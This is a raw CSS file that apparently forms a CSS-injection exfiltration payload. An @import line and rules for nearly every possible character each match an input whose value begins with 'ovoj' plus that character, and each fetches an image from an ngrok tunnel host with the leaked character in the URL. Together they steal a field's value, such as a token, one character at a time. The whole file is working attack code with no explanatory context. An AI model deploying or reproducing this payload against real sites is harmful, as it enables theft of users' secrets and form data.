@import url("http://bc0a37bcf1d5.ngrok.io/?l=6");
input[value="ovoj!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.19773474363629395");}
input[value="ovoj\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.9043639885967323");}
input[value="ovoj#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.8826636714190166");}
input[value="ovoj$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.8809043004047057");}
input[value="ovoj%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.6178479352845159");}
input[value="ovoj&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.4022663328273881");}
input[value="ovoj'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.2389184780354574");}
input[value="ovoj("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.22927446261735995");}
input[value="ovoj)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.6867607598066792");}
input[value="ovoj*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.3205137077116924");}
input[value="ovoj+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.16026110258316661");}
input[value="ovoj,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.7748072066469982");}
input[value="ovoj-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.0005803266908070981");}
input[value="ovoj."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.4356223880737695");}
input[value="ovoj/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.7156672897038598");}
input[value="ovoj0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.7303358861388876");}
input[value="ovoj1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.9375053585418036");}
input[value="ovoj2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.9043025013644901");}
input[value="ovoj3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.8268869336085094");}
input[value="ovoj4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.41792911079025674");}
input[value="ovoj5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.9041216570035977");}
input[value="ovoj6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.7277823958906204");}
input[value="ovoj7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.8894649660355991");}
input[value="ovoj8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.8663594088656219");}
input[value="ovoj9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.6023499529406096");}
input[value="ovoj:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.5786850561454961");}
input[value="ovoj;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.9781793327626169");}
input[value="ovoj<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.3727920154464408");}
input[value="ovoj="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.4588351160296742");}
input[value="ovoj>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.3641823847873362");}
input[value="ovoj?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.8963936544426769");}
input[value="ovoj@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.8202639534321883");}
input[value="ovojA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.8302138993219415");}
input[value="ovojB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.49232417689605756");}
input[value="ovojC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.09349317312794359");}
input[value="ovojD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.7618632662180191");}
input[value="ovojE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.7528145393091048");}
input[value="ovojF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.6202292269307337");}
input[value="ovojG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.11446854434920395");}
input[value="ovojH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.6054013839962511");}
input[value="ovojI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.7633973969458776");}
input[value="ovojJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.3636995284328215");}
input[value="ovojK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.6846418308582702");}
input[value="ovojL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.8671941254562594");}
input[value="ovojM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.3601390175675028");}
input[value="ovojN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.9219376164444644");}
input[value="ovojO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.9720577478115853");}
input[value="ovojP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.37926372134197717");}
input[value="ovojQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.2913581571926578");}
input[value="ovojR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.6155664574624273");}
input[value="ovojS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.37426471319831833");}
input[value="ovojT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.8149254549529459");}
input[value="ovojU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.3025580499441427");}
input[value="ovojV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.4776352526599488");}
input[value="ovojW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.14994441800366598");}
input[value="ovojX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.13060909546163946");}
input[value="ovojY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.029615634809854408");}
input[value="ovojZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.5808338243895403");}
input[value="ovoj["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.18544499448610163");}
input[value="ovoj\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.7536103917059787");}
input[value="ovoj]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.43781282597126836");}
input[value="ovoj^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.41583327136868875");}
input[value="ovoj_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.6428413610423092");}
input[value="ovoj`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.2424110144331304");}
input[value="ovoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.14062970315897183");}
input[value="ovojb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.8814280009563762");}
input[value="ovojc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.5314319981121582");}
input[value="ovojd"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.47361018543852307");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.2975090281607764");}
input[value="ovojf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.6413280714761584");}
input[value="ovojg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.5650110474063679");}
input[value="ovojh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.020135298327896844");}
input[value="ovoji"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.1790257986018644");}
input[value="ovojj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.10075091695082361");}
input[value="ovojk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.21188648556897127");}
input[value="ovojl"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.5465431198476745");}
input[value="ovojm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8990205548464749");}
input[value="ovojn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.23977841852486903");}
input[value="ovojo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.7725719872153054");}
input[value="ovojp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.663677261787702");}
input[value="ovojq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.627609464068096");}
input[value="ovojr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.31189911336823917");}
input[value="ovojs"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.6447077903300436");}
input[value="ovojt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.8671941415171192");}
input[value="ovoju"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.7888134945600092");}
input[value="ovojv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.04596133741647912");}
input[value="ovojw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.40070416185364977");}
input[value="ovojx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.24422109656167712");}
input[value="ovojy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.06723931339252487");}
input[value="ovojz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.9493400604794044");}
input[value="ovoj{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.25250609280000846");}
input[value="ovoj|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.9519118487406721");}
input[value="ovoj}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.3827778955379739");}
input[value="ovoj~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.7428657048465279");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8388623620877085");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8449033788259499");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7278683456027413");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05162492983989497");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10799148974521655");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7751494907508043");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6849997039800282");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.529735996725806");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2699056335399046");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06770720279999431");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.15947671304725586");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2885771614977013");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.49548746566268953");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08078767241492879");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18070388916880198");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7300600216520012");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2788219202670008");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6447397876820253");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.40556608659441906");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6960316802066655");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8437370513120352");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6894603266472508");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3796187155897979");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8939533308233181");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8085746961918658");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.42528789956734125");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0795297486795199");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6461859940974908");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2151795823037621");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05528265347744843");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.16211000748815185");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09948599283447468");}
input[value="ovoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.938992023857061");}
input[value="ovoj "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.10095623240162643");}
input[value="ovoj¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.3009903353407273");}
input[value="ovoj¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.6775775146370626");}
input[value="ovoj£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.3683494332045858");}
input[value="ovoj¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.29984243479856554");}
input[value="ovoj¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.02040088776140503");}
input[value="ovoj¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.9810152840845123");}
input[value="ovoj§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.8415794504104557");}
input[value="ovoj¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.2529764631662228");}
input[value="ovoj©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.12031755202343586");}
input[value="ovojª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.25994793844460595");}
input[value="ovoj«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.306028796417144");}
input[value="ovoj¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.8611930969866217");}
input[value="ovoj­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.09577780590687923");}
input[value="ovoj®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.9856003805531246");}
input[value="ovoj¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.32784705448353213");}
input[value="ovoj°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.7928564758796814");}
input[value="ovoj±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.9032733646141788");}
input[value="ovoj²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.09599518386416972");}
input[value="ovoj³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.7108040332681849");}
input[value="ovoj´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.7182327319435042");}
input[value="ovojµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.04495095163615215");}
input[value="ovoj¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.0777764610262568");}
input[value="ovoj·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.30349775903598974");}
input[value="ovoj¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.36098645590608114");}
input[value="ovoj¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.8322635598538013");}
input[value="ovojº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.3022138827928489");}
input[value="ovoj»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.7043189930767002");}
input[value="ovoj¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.01604773340002441");}
input[value="ovoj½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.7986847785227222");}
input[value="ovoj¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.5598295072214012");}
input[value="ovoj¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.4010417022096908");}
input[value="ovojÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.08617922429033098");}
input[value="ovojÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.5907074385949724");}
input[value="ovojÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.6428339319788576");}
input[value="ovojÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.6681402445090312");}
input[value="ovojÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.08004439027729404");}
input[value="ovojÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.102166436486405");}
input[value="ovojÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.7961436840501768");}
input[value="ovojÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.9610379038886532");}
input[value="ovojÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.09958578102095705");}
input[value="ovojÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.5463731940093486");}
input[value="ovojÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.20406147948475395");}
input[value="ovojË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.627154236479317");}
input[value="ovojÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.598151667086184");}
input[value="ovojÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.3360261764332071");}
input[value="ovojÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.18504098827462445");}
input[value="ovojÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.7109059594521956");}
input[value="ovojÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.44968586510719755");}
input[value="ovojÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.9398936272743124");}
input[value="ovojÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.8966994839794049");}
input[value="ovojÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.15694548630175986");}
input[value="ovojÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.5050632636738095");}
input[value="ovojÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.34234893372444297");}
input[value="ovojÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.9026130501001242");}
input[value="ovoj×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.341769964826544");}
input[value="ovojØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.7663930119085227");}
input[value="ovojÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.025314075348756182");}
input[value="ovojÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.011461703028646575");}
input[value="ovojÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.07970322417756126");}
input[value="ovojÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.18141330826678614");}
input[value="ovojÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.8415869183109279");}
input[value="ovojÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.5455070932482919");}
input[value="ovojß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.33698706395903355");}
input[value="ovojà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.8250213893228471");}
input[value="ovojá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.5638974469004991");}
input[value="ovojâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.6760512505983041");}
input[value="ovojã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.0935979953233137");}
input[value="ovojä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.4908275118047647");}
input[value="ovojå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.8968353872449963");}
input[value="ovojæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.0746125742702235");}
input[value="ovojç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.648740708813007");}
input[value="ovojè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.4237414602262206");}
input[value="ovojé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.7276081114133155");}
input[value="ovojê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.603526021737532");}
input[value="ovojë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.7192802323914171");}
input[value="ovojì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.10131263824882675");}
input[value="ovojí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.6197005233583945");}
input[value="ovojî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.4498665430780362");}
input[value="ovojï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.675261990607692");}
input[value="ovojð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.5093620156465799");}
input[value="ovojñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.06395325325234835");}
input[value="ovojò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.7416312306729962");}
input[value="ovojó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.49958499607762485");}
input[value="ovojô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.6210607464004434");}
input[value="ovojõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.7731588016342756");}
input[value="ovojö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.7722810954041754");}
input[value="ovoj÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.6967499072864587");}
input[value="ovojø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.504176684482101");}
input[value="ovojù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.18352217841956842");}
input[value="ovojú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.9857505900081689");}
input[value="ovojû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.08053001740811627");}
input[value="ovojü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.29279365365948995");}
input[value="ovojý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.45472326611443203");}
input[value="ovojþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.5742732764274907");}
input[value="ovojÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.8818570657723719");}
